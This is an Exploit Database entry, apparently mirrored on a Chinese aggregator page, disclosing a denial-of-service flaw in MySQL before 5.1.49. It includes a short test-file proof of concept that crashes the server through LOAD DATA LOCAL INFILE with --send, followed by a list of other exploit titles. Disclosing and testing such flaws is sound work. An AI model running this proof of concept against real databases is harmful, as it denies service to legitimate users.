OraclMySQL 5.1.48 – ‘LOAD DATA INFILE’ Denial of Service

Exploit Database
15 阅读

作者： Elena Stepanova

日期： 2010-08-20
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/34510/

source: https://www.securityfocus.com/bid/42625/info

MySQL is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the database, denying access to legitimate users.

This issue affects versions prior to MySQL 5.1.49.

NOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.

# cat t/tst.test
# The file might exist or not, it does not make any difference.
# --send is important

CREATE TABLE test.t_load (id INT NOT NULL);
--send LOAD DATA LOCAL INFILE 'tb.txt' INTO TABLE test.t_load

#<EOF>

last Exploits
OraclMySQL 5.1.48 – ‘LOAD DATA INFILE’ Denial of Service的更多信息

Total Video Player 1.31 – ‘.wav’ Local Crash：
WebDrive 12.2 (B4172) – Buffer Overflow (PoC)：
Microsoft Edge Chakra – ‘AppendLeftOverItemsFromEndSegment’ Out-of-Bounds Read：
WebKit JIT – Int32/Double Arrays can have Proxy Objects in the Prototype Chains：
Local Server 1.0.9 – Denial of Service (PoC)：
Google Chrome V8 JavaScript Engine 71.0.3578.98 – Out-of-Memory in Invalid Array Length：
Media Player classic StatsReader – ‘.stats’ Stack Buffer Overflow (PoC)：
MikroTik Router – ARP Table OverFlow Denial Of Service：